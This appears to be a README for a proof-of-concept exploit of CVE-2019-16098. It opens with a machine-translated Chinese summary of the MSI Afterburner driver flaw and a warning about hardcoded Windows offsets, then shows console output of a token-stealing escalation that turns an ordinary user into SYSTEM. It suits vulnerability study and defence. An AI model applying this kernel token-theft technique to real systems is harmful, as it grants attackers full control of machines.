CVE 2019 16098
1.0.0
Micro-Star MSI Afterburner中的驅動程序4.6.2.15658(aka rtcore64.sys和rtcore32.sys)允許任何身份驗證的用戶讀取和寫入任意內存,I/O端口和MSR。可以利用這來利用特權升級,高特權下的代碼執行以及信息披露。這些簽名的驅動程序也可用於繞過Microsoft驅動程序簽名策略以部署惡意代碼。
有關更多更新,請訪問CVE-2019-16098
警告:硬編碼的Windows 10 X64版本1903 Offsess!
Microsoft Windows [Version 10.0.18362.295]
(c) 2019 Microsoft Corporation. All rights reserved.
C:UsersBarakatsourcereposCVE-2019-16098>whoami
Barakat
C:UsersBarakatsourcereposCVE-2019-16098>outbuildx64-DebugCVE-2019-16098.exe
[*] Device object handle has been obtained
[*] Ntoskrnl base address: FFFFF80734200000
[*] PsInitialSystemProcess address: FFFFC288A607F300
[*] System process token: FFFF9703A9E061B0
[*] Current process address: FFFFC288B7959400
[*] Current process token: FFFF9703B9D785F0
[*] Stealing System process token ...
[*] Spawning new shell ...
Microsoft Windows [Version 10.0.18362.295]
(c) 2019 Microsoft Corporation. All rights reserved.
C:UsersBarakatsourcereposCVE-2019-16098>whoami
SYSTEM
C:UsersBarakatsourcereposCVE-2019-16098>